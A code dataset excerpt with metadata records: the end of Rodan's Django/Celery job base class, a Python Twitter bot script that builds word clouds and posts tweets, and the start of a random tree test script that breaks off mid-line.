check_field(\"job_queue\", j.job_queue, schema.get(\"job_queue\", \"celery\"))\n\n # Input Port Types\n def check_port_types(which):\n \"which == 'in' or 'out'\"\n if which == \"in\":\n attrs_pts = list(copy.deepcopy(attrs[\"input_port_types\"]))\n db_pts = list(j.input_port_types.all())\n msg = \"Input\"\n elif which == \"out\":\n attrs_pts = list(copy.deepcopy(attrs[\"output_port_types\"]))\n db_pts = list(j.output_port_types.all())\n msg = \"Output\"\n\n for pt in db_pts:\n pt_name = pt.name\n\n idx = next(\n (\n i\n for (i, this_pt) in enumerate(attrs_pts)\n if (this_pt[\"name\"] == pt_name)\n ),\n None,\n )\n if (\n idx is not None\n ): # pt exists in database and in code. Check values\n attrs_pt = attrs_pts[idx]\n\n # Compare values\n if attrs_pt[\"minimum\"] != pt.minimum:\n if not UPDATE_JOBS:\n raise ImproperlyConfigured(\n (\n \"The field `{0}` of {5} Port Type `{1}` of Job \"\n \"`{2}` seems to be updated: {3} --> {4}. Try to\"\n \" run `manage.py migrate` to confirm this update.\"\n ).format(\n \"minimum\",\n pt_name,\n j.name,\n pt.minimum,\n attrs_pt[\"minimum\"],\n msg,\n )\n )\n else:\n confirm_update = confirm(\n (\n \"The field `{0}` of {5} Port Type `{1}` of Job `{2}`\"\n \" seems to be updated: \\n{3}\\n -->\\n{4}\\n\\nConfirm \"\n \"(y/N)? \"\n ).format(\n \"minimum\",\n pt_name,\n j.name,\n pt.minimum,\n attrs_pt[\"minimum\"],\n msg,\n )\n )\n if confirm_update:\n pt.minimum = attrs_pt[\"minimum\"]\n pt.save()\n print(\" ..updated.\\n\\n\")\n else:\n print(\" ..not updated.\\n\\n\")\n\n if attrs_pt[\"maximum\"] != pt.maximum:\n if not UPDATE_JOBS:\n raise ImproperlyConfigured(\n (\n \"The field `{0}` of {5} Port Type `{1}` of Job `{2}`\"\n \" seems to be updated: {3} --> {4}. Try to run \"\n \"`manage.py migrate` to confirm this update.\"\n ).format(\n \"maximum\",\n pt_name,\n j.name,\n pt.maximum,\n attrs_pt[\"maximum\"],\n msg,\n )\n )\n else:\n confirm_update = confirm(\n (\n \"The field `{0}` of {5} Port Type `{1}` of Job `{2}`\"\n \" seems to be updated: \\n{3}\\n -->\\n{4}\\n\\nConfirm \"\n \"(y/N)? \"\n ).format(\n \"maximum\",\n pt_name,\n j.name,\n pt.maximum,\n attrs_pt[\"maximum\"],\n msg,\n )\n )\n if confirm_update:\n pt.maximum = attrs_pt[\"maximum\"]\n pt.save()\n print(\" ..updated.\\n\\n\")\n else:\n print(\" ..not updated.\\n\\n\")\n\n attrs_is_list = bool(attrs_pt.get(\"is_list\", False))\n if attrs_is_list != pt.is_list:\n if not UPDATE_JOBS:\n raise ImproperlyConfigured(\n (\n \"The field `{0}` of {5} Port Type `{1}` of Job `{2}`\"\n \" seems to be updated: {3} --> {4}. Try to run \"\n \"`manage.py migrate` to confirm this update.\"\n ).format(\n \"is_list\",\n pt_name,\n j.name,\n pt.is_list,\n attrs_is_list,\n msg,\n )\n )\n else:\n confirm_update = confirm(\n (\n \"The field `{0}` of {5} Port Type `{1}` of Job `{2}`\"\n \" seems to be updated: \\n{3}\\n -->\\n{4}\\n\\nConfirm \"\n \"(y/N)? \"\n ).format(\n \"is_list\",\n pt_name,\n j.name,\n pt.is_list,\n attrs_is_list,\n msg,\n )\n ) # noqa\n if confirm_update:\n pt.is_list = attrs_is_list\n pt.save()\n print(\" ..updated.\\n\\n\")\n else:\n print(\" ..not updated.\\n\\n\")\n\n resource_types = RodanTaskType._resolve_resource_types(\n attrs_pt[\"resource_types\"]\n )\n rt_code = set(list(map(lambda rt: rt.mimetype, resource_types))) #map works differently in py2->3, need to add list \n rt_db = set(\n list((map(lambda rt: rt.mimetype, pt.resource_types.all())))\n )\n if rt_code != rt_db:\n if not UPDATE_JOBS:\n raise ImproperlyConfigured(\n (\n \"The field `{0}` of {5} Port Type `{1}` of Job `{2}`\"\n \" seems to be updated: {3} --> {4}. Try to run. \"\n \"`manage.py migrate` to confirm this update.\"\n ).format(\n \"resource_types\",\n pt_name,\n j.name,\n rt_db,\n rt_code,\n msg,\n )\n )\n else:\n confirm_update = confirm(\n (\n \"The field `{0}` of {5} Port Type `{1}` of Job `{2}` \"\n \"seems to be updated: \\n{3}\\n -->\\n{4}\\n\\nConfirm \"\n \"(y/N)? \"\n ).format(\n \"resource_types\",\n pt_name,\n j.name,\n rt_db,\n rt_code,\n msg,\n )\n ) # noqa\n if confirm_update:\n pt.resource_types.clear()\n pt.resource_types.add(*resource_types)\n print(\" ..updated.\\n\\n\")\n else:\n print(\" ..not updated.\\n\\n\")\n\n del attrs_pts[idx]\n\n else: # pt exists in database but not in code. Should be deleted.\n if not UPDATE_JOBS:\n raise ImproperlyConfigured(\n (\n \"The {2} Port Type `{0}` of Job `{1}` seems to be \"\n \"deleted. Try to run `manage.py migrate` to confirm this\"\n \" deletion.\"\n ).format(pt_name, j.name, msg)\n )\n else:\n confirm_delete = confirm(\n (\n \"The {2} Port Type `{0}` of Job `{1}` seems to be\"\n \" deleted. Confirm (y/N)? \"\n ).format(pt_name, j.name, msg)\n )\n if confirm_delete:\n try:\n pt.delete()\n print(\" ..deleted.\\n\\n\")\n except Exception as e:\n print(\n (\n \" ..not deleted because of an exception: {0}.\"\n \" Please fix it manually.\\n\\n\"\n ).format(str(e))\n )\n else:\n print(\" ..not deleted.\\n\\n\")\n\n # ipt exists in code but not in database. Should be added to the database.\n if attrs_pts:\n for pt in attrs_pts:\n if not UPDATE_JOBS:\n raise ImproperlyConfigured(\n \"The {2} Port Type `{0}` of Job `{1}` seems to be newly added. Try to run `manage.py migrate` to confirm this update.\".format( # noqa\n pt[\"name\"], j.name, msg\n )\n )\n else:\n confirm_update = confirm(\n \"The {2} Port Type `{0}` of Job `{1}` seems to be newly added. Confirm (y/N)? \".format( # noqa\n pt[\"name\"], j.name, msg\n )\n )\n if confirm_update:\n if which == \"in\":\n Model = InputPortType\n elif which == \"out\":\n Model = OutputPortType\n i = Model(\n job=j,\n name=pt[\"name\"],\n minimum=pt[\"minimum\"],\n maximum=pt[\"maximum\"],\n is_list=bool(pt.get(\"is_list\", False)),\n )\n i.save()\n resource_types = RodanTaskType._resolve_resource_types(\n pt[\"resource_types\"]\n )\n if len(resource_types) == 0:\n raise ValueError(\n (\n \"No available resource types found\"\n \" for this {1}PortType: {0}\"\n ).format(pt[\"resource_types\"], msg)\n )\n i.resource_types.add(*resource_types)\n print(\" ..updated.\\n\\n\")\n else:\n print(\" ..not updated.\\n\\n\")\n\n check_port_types(\"in\")\n check_port_types(\"out\")\n\n # Process done\n from rodan.jobs.load import job_list\n\n if attrs[\"name\"] in job_list:\n job_list.remove(attrs[\"name\"])\n\n @staticmethod\n def _resolve_resource_types(value):\n \"\"\"\n `value` should be one of:\n - a list of strings of mimetypes\n - a callable which receives one parameter (as a filter)\n\n Returns a list of ResourceType objects.\n \"\"\"\n try:\n mimelist = list(filter(\n value, ResourceType.objects.all().values_list(\"mimetype\", flat=True)\n ))\n except TypeError:\n mimelist = value\n return ResourceType.objects.filter(mimetype__in=mimelist)\n\n\nclass RodanTask(Task,metaclass=RodanTaskType):\n # __metaclass__ = RodanTaskType\n abstract = True\n\n ################################\n # Private retrieval methods\n ################################\n\n def _inputs(self, runjob, with_urls=False):\n \"\"\"\n Return a dictionary of list of input file path and input resource type.\n If with_urls=True, it also includes the resource url and thumbnail urls.\n \"\"\"\n\n def _extract_resource(resource, resource_type_mimetype=None):\n r = {\n # convert 'unicode' object to 'str' object for consistency\n \"resource_path\": str(resource.resource_file.path),\n \"resource_type\": str(\n resource_type_mimetype or resource.resource_type.mimetype\n ),\n }\n if with_urls:\n r[\"resource_url\"] = str(resource.resource_url)\n r[\"diva_object_data\"] = str(resource.diva_json_url)\n r[\"diva_iip_server\"] = getattr(rodan_settings, \"IIPSRV_URL\")\n r[\"diva_image_dir\"] = str(resource.diva_image_dir)\n return r\n\n input_objs = (\n Input.objects.filter(run_job=runjob)\n .select_related(\"resource\", \"resource__resource_type\", \"resource_list\")\n .prefetch_related(\"resource_list__resources\")\n )\n\n inputs = {}\n for input in input_objs:\n ipt_name = str(input.input_port_type_name)\n if ipt_name not in inputs:\n inputs[ipt_name] = []\n if input.resource is not None: # If resource\n inputs[ipt_name].append(_extract_resource(input.resource))\n elif input.resource_list is not None: # If resource_list\n inputs[ipt_name].append(\n list(map(\n lambda x: _extract_resource(\n x, input.resource_list.get_resource_type().mimetype\n ),\n input.resource_list.resources.all(),\n ))\n )\n else:\n raise RuntimeError(\n (\n \"Cannot find any resource or resource list on Input\" \" {0}\"\n ).format(input.uuid)\n )\n return inputs\n\n def _outputs(self, runjob):\n \"\"\"\n Return a dictionary of list of dictionary describing output information\n (resource type, resource or resource list, and original uuid).\n \"\"\"\n output_objs = (\n Output.objects.filter(run_job=runjob)\n .select_related(\"resource\", \"resource__resource_type\", \"resource_list\")\n .prefetch_related(\"resource_list__resources\")\n )\n\n outputs = {}\n for output in output_objs:\n opt_name = str(output.output_port_type_name)\n if opt_name not in outputs:\n outputs[opt_name] = []\n if output.resource is not None: # If resource\n outputs[opt_name].append(\n {\n \"resource_type\": str(output.resource.resource_type.mimetype),\n \"uuid\": output.uuid,\n \"is_list\": False,\n }\n )\n elif output.resource_list is not None: # If resource_list\n outputs[opt_name].append(\n {\n \"resource_type\": str(\n output.resource_list.resource_type.mimetype\n ),\n \"uuid\": output.uuid,\n \"is_list\": True,\n }\n )\n else:\n raise RuntimeError(\n (\n \"Cannot find any resource or resource list on \" \"Output {0}\"\n ).format(output.uuid)\n )\n return outputs\n\n def _settings(self, runjob):\n rj_settings = runjob.job_settings\n j_settings = Job.objects.get(name=runjob.job_name).settings\n\n for properti, definition in j_settings.get(\"properties\", {}).items():\n if \"enum\" in definition: # convert enum to integers\n rj_settings[properti] = definition[\"enum\"].index(rj_settings[properti])\n\n return rj_settings\n\n def _package_path(self):\n base_path = os.path.dirname(settings.PROJECT_PATH)\n rel_path = os.sep.join(self._package_name.split(\".\"))\n return os.path.join(base_path, rel_path) # e.g.: \"/path/to/rodan/jobs/gamera\"\n\n ########################\n # Test interface\n ########################\n def test_my_task(self, testcase):\n \"\"\"\n This method is called when executing `manage.py test test_all_jobs`.\n\n This method should call `run_my_task()` and/or `get_my_interface()` and/or\n `validate_my_user_input`. Before calling the job code, this method needs to\n construct `inputs`, `settings`, and `outputs` objects as parameters of the\n job code.\n\n Its own parameter `testcase` refers to the Python TestCase object. Aside from\n assertion methods like `assertEqual()` and `assertRaises()`, it provides\n `new_available_path()` which returns a path to a nonexist file. `test_my_task`\n method can thus create an input file and pass into the job code.\n \"\"\"\n print(\n \"WARNING: {0}.test_my_task() is not implemented.\".format(\n type(self).__module__\n )\n )\n\n #######################\n # Utilities\n #######################\n class WAITING_FOR_INPUT(object):\n \"\"\"\n As a possible return value of run_my_task() to indicate the interactive phase\n of the job, and return value of validate_my_user_input() to indicate the job\n staying in interactive phase.\n\n It holds the settings that need to be updated. The name of the settings must\n start with \"@\" in order to be distinguished from original settings. Keys not\n starting with \"@\" will be removed. Example:\n\n return self.WAITING_FOR_INPUT({'@field1': newVal1, '@field2': newVal2})\n\n The `response` attribute is for the manual phase returning HTTP responses.\n \"\"\"\n\n def __init__(self, settings_update={}, response=None):\n self.settings_update = {}\n self.response = response\n for k, v in settings_update.items():\n if isinstance(k, str) and k.startswith(\"@\"): # noqa\n self.settings_update[k] = v\n \n # this is not throwing error in rodan for python3 \n\n def tempdir(self):\n \"\"\"\n A shortcut for all jobs.\n\n Usage:\n with self.tempdir() as tempdir:\n \"\"\"\n return TemporaryDirectory()\n\n #############################################\n # Automatic phase -- running in Celery thread\n #############################################\n def run(self, runjob_id):\n \"\"\"\n Code here are run asynchronously in Celery thread.\n\n To prevent re-creating a deleted object, any write to database should use\n one of the following:\n + `queryset.update()`\n + `obj.save(update_fields=[...])`\n + `obj.file_field.save(..., save=False)` + `obj.save(update_fields=['file_field'])`\n\n instead of:\n + `obj.save()`\n + `obj.file_field.save(..., save=True)`\n \"\"\"\n runjob = RunJob.objects.get(uuid=runjob_id)\n settings = self._settings(runjob)\n inputs = self._inputs(runjob)\n\n start_time = time.time()\n\n with self.tempdir() as temp_dir:\n outputs = self._outputs(runjob)\n\n # build argument for run_my_task and mapping dictionary\n arg_outputs = {}\n # retains where originally assigned paths are from... prevent jobs changing them\n temppath_map = {}\n\n for opt_name, output_list in outputs.items():\n if opt_name not in arg_outputs:\n arg_outputs[opt_name] = []\n for output in output_list:\n if output[\"is_list\"] is False:\n output_res_tempname = str(uuid.uuid4())\n output_res_temppath = os.path.join(\n temp_dir, output_res_tempname\n )\n arg_outputs[opt_name].append(\n {\n \"resource_path\": output_res_temppath,\n \"resource_type\": output[\"resource_type\"],\n }\n )\n output[\"resource_temp_path\"] = output_res_temppath\n temppath_map[output_res_temppath] = output\n else:\n # create a folder for them\n output_res_tempname = str(uuid.uuid4())\n output_res_tempfolder = (\n os.path.join(temp_dir, output_res_tempname) + os.sep\n )\n os.mkdir(output_res_tempfolder)\n arg_outputs[opt_name].append(\n {\n \"resource_folder\": output_res_tempfolder,\n \"resource_type\": output[\"resource_type\"],\n }\n )\n output[\"resource_temp_folder\"] = output_res_tempfolder\n temppath_map[output_res_tempfolder] = output\n logger.info(\"started running the task!\")\n retval = self.run_my_task(inputs, settings, arg_outputs)\n logger.info((\"ran the task and the returned object is {0}\").format(retval))\n\n if isinstance(retval, self.WAITING_FOR_INPUT):\n logger.info((\"the settings_update field is: {0}\").format(retval.settings_update))\n try:\n if type(retval.settings_update[\"@settings\"]) == bytes:\n retval.settings_update[\"@settings\"] = retval.settings_update[\"@settings\"].decode(\"UTF-8\")\n except KeyError:\n pass\n settings.update(retval.settings_update)\n logger.info((\"After being updated the settings_update field is: {0}\").format(retval.settings_update))\n\n # for python3 we have to use decode utf 8 for jason format \n # for the last step of the biollante job\n # first iteration the updated version is the same as the initial version\n # encoded again? biollante is working?\n # before updating have to decode\n\n runjob.status = task_status.WAITING_FOR_INPUT\n runjob.job_settings = settings\n runjob.error_summary = None\n runjob.error_details = None\n runjob.celery_task_id = None\n runjob.save(\n update_fields=[\n \"status\",\n \"job_settings\",\n \"error_summary\",\n \"error_details\",\n \"celery_task_id\",\n ]\n )\n\n # Send an email to owner of WorkflowRun\n wfrun_id = RunJob.objects.filter(pk=runjob_id).values_list(\n \"workflow_run__uuid\", flat=True\n )[0]\n workflow_run = WorkflowRun.objects.get(uuid=wfrun_id)\n user = WorkflowRun.objects.get(uuid=wfrun_id).creator\n if not rodan_settings.TEST:\n if (\n user.email\n and rodan_settings.EMAIL_USE\n and user.user_preference.send_email\n ):\n to = [user.email]\n email_template = \"emails/workflow_run_waiting_for_user_input.html\"\n context = {\"name\": workflow_run.name, \"description\": workflow_run.description}\n registry.tasks[\"rodan.core.send_templated_email\"].apply_async((to, email_template, context))\n\n return \"WAITING FOR INPUT\"\n else:\n # ensure the runjob did not produce any error\n try:\n # err = self.error_details\n if len(self.error_details) > 0:\n raise RuntimeError(self.error_details)\n except AttributeError:\n pass\n\n # ensure the job has produced all output files\n for opt_name, output_list in outputs.items():\n for output in output_list:\n if output[\"is_list\"] is False:\n if not os.path.isfile(output[\"resource_temp_path\"]):\n raise RuntimeError(\n (\n \"The job did not produce the output file\"\n \" for {0}.\\n\\n{1}\"\n ).format(opt_name, outputs)\n )\n else:\n files = [\n f\n for f in os.listdir(output[\"resource_temp_folder\"])\n if os.path.isfile(\n os.path.join(output[\"resource_temp_folder\"], f)\n )\n ] # noqa\n if len(files) == 0:\n raise RuntimeError(\n (\n \"The job did not produce any output files \"\n \"for the resource list for {0}\"\n ).format(opt_name)\n )\n\n for temppath, output in temppath_map.items():\n if output[\"is_list\"] is False:\n with open(temppath, \"rb\") as f:\n resource = Output.objects.get(uuid=output[\"uuid\"]).resource\n # Django will resolve the path according to upload_to\n resource.resource_file.save(temppath, File(f), save=False)\n resource.save(update_fields=[\"resource_file\"])\n if resource.resource_type.mimetype.startswith(\"image\"):\n # call synchronously\n # registry.tasks['rodan.core.create_thumbnails'].run(resource.uuid.hex)\n\n # call synchronously\n # registry.tasks['rodan.core.create_diva'].run(resource.uuid.hex)\n\n # call asynchronously\n registry.tasks[\"rodan.core.create_diva\"].si(\n resource.uuid.hex\n ).apply_async(\n queue=\"celery\"\n ) # noqa\n else:\n files = [\n ff\n for ff in os.listdir(output[\"resource_temp_folder\"])\n if os.path.isfile(\n os.path.join(output[\"resource_temp_folder\"], ff)\n )\n ]\n files.sort() # alphabetical order\n\n resourcelist = Output.objects.get(\n uuid=output[\"uuid\"]\n ).resource_list\n for index, ff in enumerate(files):\n with open(\n os.path.join(output[\"resource_temp_folder\"], ff), \"rb\"\n ) as f:\n resource = Resource(\n project=resourcelist.project,\n resource_type=resourcelist.resource_type,\n name=ff,\n description=\"Order #{0} in ResourceList {1}\".format(\n index, resourcelist.name\n ),\n origin=resourcelist.origin,\n )\n resource.save()\n\n # Django will resolve the path according to upload_to\n resource.resource_file.save(ff, File(f), save=False)\n resource.save(update_fields=[\"resource_file\"])\n if resource.resource_type.mimetype.startswith(\"image\"):\n # call synchronously\n # registry.tasks['rodan.core.create_thumbnails'].run(resource.uuid.hex)\n\n # call synchronously\n registry.tasks[\"rodan.core.create_diva\"].run(\n resource.uuid.hex\n )\n\n # call synchronously\n # registry.tasks['rodan.core.create_diva'].si(resource.uuid.hex).apply_async(queue=\"celery\") # noqa\n resourcelist.resources.add(resource)\n\n runjob.status = task_status.FINISHED\n runjob.error_summary = None\n runjob.error_details = None\n runjob.celery_task_id = None\n runjob.save(\n update_fields=[\n \"status\",\n \"error_summary\",\n \"error_details\",\n \"celery_task_id\",\n ]\n )\n\n # Update workflow run description with job info\n wall_time = time.time() - start_time\n try:\n snapshot_info = \"\\n\\n{0}:\\n name: \\\"{1}\\\"\\n wall_time: \\\"{2}\\\"\\n\".format(\n str(runjob.uuid),\n runjob.job_name,\n time.strftime(\"%H:%M:%S\", time.gmtime(wall_time))\n )\n\n if len(settings) > 0:\n snapshot_info += \" settings:\\n\"\n for key, value in settings.iteritems():\n snapshot_info += \" {0}: {1}\\n\".format(str(key), str(value))\n\n input_qs = Input.objects.filter(run_job=runjob)\n if input_qs.count() > 0:\n snapshot_info += \" inputs:\\n\"\n for input in input_qs:\n snapshot_info += \" - uuid: {0}\\n\" \\\n .format(str(input.resource.uuid))\n snapshot_info += \" name: \\\"{0}\\\"\\n\" \\\n .format(input.resource.name)\n\n output_qs = Output.objects.filter(run_job=runjob)\n if output_qs.count() > 0:\n snapshot_info += \" outputs:\\n\"\n for output in Output.objects.filter(run_job=runjob):\n snapshot_info += \" - uuid: {0}\\n\" \\\n .format(str(output.resource.uuid))\n snapshot_info += \" name: \\\"{0}\\\"\\n\" \\\n .format(input.resource.name)\n\n snapshot_info += \"\\n\"\n\n with transaction.atomic():\n atomic_wfrun = WorkflowRun.objects.select_for_update() \\\n .get(uuid=runjob.workflow_run.uuid)\n if atomic_wfrun.description is None:\n atomic_wfrun.description = \"\"\n atomic_wfrun.description += snapshot_info\n atomic_wfrun.save(update_fields=[\"description\"])\n except AttributeError: # This happens during tests where not all fields are set\n pass\n except Exception as e:\n print(e)\n\n # Call master task.\n master_task = registry.tasks[\"rodan.core.master_task\"]\n wfrun_id = str(runjob.workflow_run.uuid)\n mt_retval = master_task.si(wfrun_id).apply_async(queue=\"celery\")\n return \"FINISHED | master_task: {0}\".format(mt_retval)\n\n def run_my_task(self, inputs, settings, outputs):\n raise NotImplementedError()\n\n def my_error_information(self, exc, traceback):\n raise NotImplementedError()\n\n def on_failure(self, exc, task_id, args, kwargs, einfo):\n runjob_id = args[0]\n\n update = self._add_error_information_to_runjob(exc, einfo)\n update[\"status\"] = task_status.FAILED\n update[\"celery_task_id\"] = None\n RunJob.objects.filter(pk=runjob_id).update(**update)\n wfrun_id = RunJob.objects.filter(pk=runjob_id).values_list(\n \"workflow_run__uuid\", flat=True\n )[0]\n WorkflowRun.objects.filter(uuid=wfrun_id).update(status=task_status.FAILED)\n\n # Send an email to owner of WorkflowRun\n workflow_run = WorkflowRun.objects.get(uuid=wfrun_id)\n user = WorkflowRun.objects.get(uuid=wfrun_id).creator\n if not rodan_settings.TEST:\n if (\n user.email\n and rodan_settings.EMAIL_USE\n and user.user_preference.sned_email\n ):\n to = [user.email]\n email_template = \"rodan/email/workflow_run_failed.html\"\n context = { \"name\": workflow_run.name, \"description\": workflow_run.description}\n registry.tasks[\"rodan.core.send_templated_email\"].apply_async((to, email_template, context))\n\n def _add_error_information_to_runjob(self, exc, einfo):\n # Any job using the default_on_failure method can define an error_information\n # method, which will take in an exception and a traceback string,\n # and return a dictionary containing 'error_summary' and 'error_details'.\n # This is to allow pretty formatting of error messages in the client.\n # If any StandardError is raised in the process of retrieving the\n # values, the default values are used for both fields.\n try:\n err_info = self.my_error_information(exc, einfo.traceback)\n err_summary = err_info[\"error_summary\"]\n err_details = err_info[\"error_details\"]\n if rodan_settings.TRACEBACK_IN_ERROR_DETAIL:\n err_details = str(err_details) + \"\\n\\n\" + str(einfo.traceback)\n except Exception as e:\n logger.warning(\n (\n \"The my_error_information method is not implemented properly\"\n \" (or not implemented at all). Exception: \"\n )\n )\n logger.warning(\"{0}: {1}\".format(e.__class__.__name__, e.__str__()))\n logger.warning(\"Using default sources for error information.\")\n err_summary = \"{0}: {1}\".format(type(exc).__name__, str(exc))\n err_details = einfo.traceback\n\n return {\"error_summary\": err_summary, \"error_details\": err_details}\n\n ##########################################\n # Manual phase -- running in Django thread\n ##########################################\n def get_interface(self, runjob_id):\n global _django_template_cache\n\n runjob = RunJob.objects.get(uuid=runjob_id)\n inputs = self._inputs(runjob, with_urls=True)\n settings = self._settings(runjob)\n\n partial_template_file, context = self.get_my_interface(inputs, settings)\n\n if isinstance(partial_template_file, Template): # only in dummy_manual_job!\n return (partial_template_file, context)\n\n template_file = os.path.join(self._package_path(), partial_template_file)\n\n if template_file in _django_template_cache:\n return (_django_template_cache[template_file], context)\n else:\n with open(template_file, \"r\") as f:\n t = Template(f.read())\n _django_template_cache = t\n return (t, context)\n\n def get_my_interface(self, inputs, settings):\n \"\"\"\n inputs will contain:\n resource_path, resource_type, resource_url\n\n Should return: (template, context), template is the relative path (relative to\n the path of package folder) to the interface HTML template file (in Django\n template language), and context should be a dictionary.\n\n could raise self.ManualPhaseException\n \"\"\"\n raise NotImplementedError()\n\n def validate_user_input(self, runjob_id, user_input):\n runjob = RunJob.objects.get(uuid=runjob_id)\n inputs = self._inputs(runjob)\n settings = self._settings(runjob)\n\n try:\n return self.validate_my_user_input(inputs, settings, user_input)\n except self.ManualPhaseException:\n raise\n\n def validate_my_user_input(self, inputs, settings, user_input):\n \"\"\"\n inputs will contain:\n resource_path, resource_type\n\n could raise rodan.jobs.base.ManualJobException\n\n should return a dictionary of the update of settings. The keys should start with\n '@' or they will be discarded.\n \"\"\"\n raise NotImplementedError()\n\n class ManualPhaseException(CustomAPIException):\n def __init__(self, errmsg):\n super(RodanTask.ManualPhaseException, self).__init__(\n errmsg, status=status.HTTP_400_BAD_REQUEST\n )\n\n\n@contextlib.contextmanager\ndef TemporaryDirectory():\n \"\"\"\n Temporary directory with automatic cleanup.\n http://stackoverflow.com/questions/13379742/right-way-to-clean-up-a-temporary-folder-in-python-class\n \"\"\"\n temp_dir = tempfile.mkdtemp()\n try:\n yield temp_dir\n finally:\n try:\n shutil.rmtree(temp_dir)\n except OSError:\n raise Exception(\"[+] hmmmm: {0}\".format(temp_dir))\n\n\ndef confirm(prompt, default=True):\n if os.environ.get(\"RODAN_NON_INTERACTIVE\") == \"true\":\n return default\n else:\n return input(prompt).lower() == \"y\"\n\n\n_django_template_cache = {}\n","repo_name":"DDMAL/Rodan","sub_path":"rodan-main/code/rodan/jobs/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":51976,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"54"} +{"seq_id":"72587035683","text":"#!/usr/bin/python3\n# -*- coding:utf8 -*-\n\nfrom Bot import Bot\nimport os\nimport datetime\nfrom datetime import date\nimport pandas as pd\nimport time\nimport sys\nimport matplotlib.pyplot as plt\nfrom wordcloud import WordCloud, STOPWORDS\nfrom scipy.misc import imread\nimport random\n\nprint(\"Criando instâncias...\")\nbot = Bot()\n\ndef grey_color_func(word, font_size, position, orientation, random_state=None, **kwargs):\n return \"hsl(0, 0%%, %d%%)\" % random.randint(60, 100)\n\ndef gernerateWordCloud():\n\n country = \"Ireland\"\n\n f = open(\"tweets\", \"w\")\n tweets = bot.getTweetsByCountry(country)\n for status in tweets:\n f.write(bot.nlp.cleanText(bot.getTweetByID(status.id).text))\n \n # print(a[0]._json['text'])\n\n f.close()\n\n words= \" \"\n count =0\n f = open(\"tweets\", \"r\")\n for line in f:\n words= words + line\n \n f.close\n \n stopwords = {\"will\"}\n\n logomask = imread(\"cloud.png\")\n\n wordcloud = WordCloud(\n stopwords=STOPWORDS.union(stopwords),\n background_color=\"black\",\n mask = logomask,\n max_words=500,\n width=1800,\n height=1400\n ).generate(words)\n\n plt.imshow(wordcloud.recolor(color_func=grey_color_func, random_state=3))\n plt.axis(\"off\")\n plt.savefig(\"./tweetcloud2.png\", dpi=300)\n\n bot.postImg(\"./tweetcloud2.png\", \"Here's a cloud words test, most speaked words in \" + country)\n plt.show()\n\ndef postTemperature():\n print(\"Recueprando Temperatura...\")\n temp = os.popen(\"/opt/vc/bin/vcgencmd measure_temp\").read().split(\"=\")[1]\n data = time.ctime()\n\n\n bot.post(\"XMechina Bot, on \"+str(data)+\". Current CPU temperature: \" + temp)\n\ndef reply():\n tweets = bot.getTweets()\n _id = tweets[0]._json['id_str']\n user = tweets[0]._json['user']['screen_name']\n bot.reply(\"Texto de reply\", _id, user)\n\ndef getTweetsByDate(user, startDate, endDate):\n tweets = bot.getTweetsByDate(user, startDate, endDate)\n # bot.writeCsv(tweets)\n # bot.showContentTweets(tweets)\n return tweets\n\ndef getTimeLineTweets():\n lFinal = [] \n tweets = bot.getTweets()\n # bot.writeCsv(tweets)\n # bot.showContentTweets(tweets, classify=False)\n return tweets\n\ndef getTweetsByUser(user):\n bot.getTweetsByUser(user)\n\ndef getTweetById(id):\n tweets = bot.getTweetByID(id)\n\n\ndef download_tweets(id_file, sentiment):\n l = []\n with open(id_file) as infile:\n for tweet_id in infile:\n tweet_id = tweet_id.strip()\n\n # if l.exist_tweet(tweet_id):\n # print(\"tweet com id: \", tweet_id, \"já foi capturado\")\n # continue\n\n try:\n tweet = getTweetById(tweet_id)\n if tweet is None:\n print(\"Sem id\")\n else:\n l.append([tweet, sentiment])\n except tweepy.error.TweepError:\n print(\"tweet com id: \", tweet_id, \"não está disponível\")\n\n print(l)\n time.sleep(0.1)\n\n# print(\"Capturando tweets positivos ...\")\n# download_tweets(\"tpositivos.txt\", 1)\n\n# print(\"Capturando tweets negativos ...\")\n# download_tweets(\"tnegativos.txt\", 0)\n# postTemperature()\n# getTweetsByUser(\"folha\")\n# bot.getTrendTopics()\n# getTimeLineTweets()\n# getTweetsByDate(\"folha\", (2020, 3, 27, 0, 0, 0), (2020, 3, 28, 12, 0, 0))\n\n# gernerateWordCloud()\n\ntweetsUsers = []\ntFinal = []\ntbd = []\ntweets = getTimeLineTweets()\n\nfor i in tweets:\n user = i._json[\"user\"][\"screen_name\"]\n tweetsUsers.append(user)\n\ntweetsUsers = list(set(tweetsUsers))\nfor i in tweetsUsers:\n print(i)\n tbd+=getTweetsByDate(i, (2020, 9, 11, 0, 0, 0), (2020, 10, 11, 18, 0, 0))\n \nbot.writeCsv(tbd)\n\nprint(\"Fim\")","repo_name":"FireStrings/twitterBot","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":3693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43895391869","text":"#!/usr/bin/python\n\nfrom tree import Tree, Node\nimport random as r\n\nnames = []\n\ndef random_place ( tree ):\n #so Here I want a random seed based on the time\n r.seed()\n cur_ptr = tree.root_node;\n for i in range(r.randrange(1, 15)):\n if not cur_ptr.isLeaf():\n if cur_ptr is tree.root_node:\n cur_ptr = cur_ptr.children[0]\n elif r.randrange(1, 10) < 5:\n break\n else:\n cur_ptr = cur_ptr.children[r.randrange(len(cur_ptr.children))]\n #if its an action we can't add a child to it\n if cur_ptr.m_type.index > 3:\n cur_ptr = cur_ptr.parent\n i = i - 1\n else:\n if cur_ptr.m_type.index > 3:\n cur_ptr = cur_ptr.parent\n i = i - 1\n else:\n break\n\n num = r.randrange(3) + 1\n\n if cur_ptr is tree.root_node and num == 3:\n num = r.randrange(2) + 1\n\n robot = 0\n node_num = tree.getNextNum()\n\n preceeding_0s = ''\n\n if ( node_num / 10 ) < 1:\n preceeding_0s = '00'\n elif ( node_num / 100) < 1:\n preceeding_0s = '0'\n\n name = ''\n if num == 4:\n name = name + 'Move_To'\n elif num == 3:\n name = name + 'AND'\n elif num == 2:\n name = name + 'OR'\n else:\n name = name + 'THEN'\n\n name = name + '_' + str(num) + '_' + str(robot) + '_' + preceeding_0s + str(node_num)\n\n names.append(name)\n\n tree.AddNode([cur_ptr, num, True])\n\nif __name__ == \"__main__\":\n \n print(\"Creating a random tree of size 900\")\n \n t = Tree()\n\n for i in range(900):\n random_place(t)\n succeeded = True\n\n print(\"Now successively searching for each node out of \" + str(len(names)) + \" added to the tree...\")\n cp = None\n for i in names:\n \n a = r.randrange(300)\n nefarious = False\n if a < 50:\n cp = t.findNodeByName(i + \"I am not a real name\")\n nefarious = True\n else:\n cp = t.findNodeByName(i)\n\n if cp is None and not 